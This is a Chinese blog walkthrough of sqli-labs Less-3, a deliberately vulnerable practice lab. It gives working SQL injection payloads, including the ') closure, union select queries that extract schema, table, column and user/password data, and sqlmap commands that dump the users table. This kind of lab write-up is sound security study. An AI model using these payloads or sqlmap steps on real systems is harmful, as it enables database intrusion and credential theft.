当前位置：首页 > news >正文

sqli-labs（第三关）

news 2025/12/3 19:23:47

前言：

今天做第三关。

正文：

进入第三关页面：
在这里插入图片描述
（1）看注入点，判断注入类型。

?id=1'   #报错
?id=1''  #不报错

说明是字符型，注入点为id
（2）找列

?id=1' order by 3 --+

这个时候发现报错了。
在这里插入图片描述
有问题，我看别人的payload，是我的闭合方式错了，系统提示的地方有一个 ') 这个就是闭合方式。

 You have an error in your SQL syntax; 
check the manual that corresponds to your MySQL server version for the right syntax to
use near 'order by 3 -- ') LIMIT 0,1' at line 1

那么好，把单引号闭合方式换成 ')
再试一下：

?id=-1') order by 2 --+
?id=-1') order by 3 --+
?id=-1') order by 4 --+

在这里插入图片描述
（3）找数据库名字

?id=-1') union select 1,2,group_concat(schema_name) from information_schema.schemata--+

在这里插入图片描述
（4）查数据库中的表的名字

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

在这里插入图片描述
（5）查users表

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

在这里插入图片描述
（6）查users表中的值

?id=-1') union select 1,group_concat(username),group_concat(password) from security.users--+

在这里插入图片描述

下面用SQLMAP跑一遍：

sqlmap.py -u http://localhost/sqli-labs/sqli-labs-master/Less-3/?id=1

在这里插入图片描述

sqlmap.py -u http://localhost/sqli-labs/sqli-labs-master/Less-3/?id=1 --dbs

在这里插入图片描述

sqlmap.py -u http://localhost/sqli-labs/sqli-labs-master/Less-3/?id=1 -D security --tables

在这里插入图片描述

sqlmap.py -u http://localhost/sqli-labs/sqli-labs-master/Less-3/?id=1 -D security -T users --column

在这里插入图片描述

sqlmap.py -u http://localhost/sqli-labs/sqli-labs-master/Less-3/?id=1 -D security -T users -C id,password ,username --dump

在这里插入图片描述

哈哈哈，结束！！！

查看全文

http://www.mrgr.cn/news/67028.html

拦截器获取controller上的自定义注解

代码随想录 | Day38 | 动态规划：01背包应用目标和一和零

LeetCode：3254. 长度为 K 的子数组的能量值 I（模拟 Java）

Spark的Standalone集群环境安装

遥感图像数字处理 - 1

QMetaObject::invokeMethod异步调用一个函数，并传入自定义类型参数

python数据结构基础(5)

Ansys Zemax | 将CODE V设计导入OpticStudio

【高中生讲机器学习】23. 最大熵模型详解+推导来啦！解决 why sigmoid！

增强型MOS管的工作原理：【图文讲解】

sls日志服务采集json格式日志

mysql的触发器

前言：

正文：

下面用SQLMAP跑一遍：

相关文章：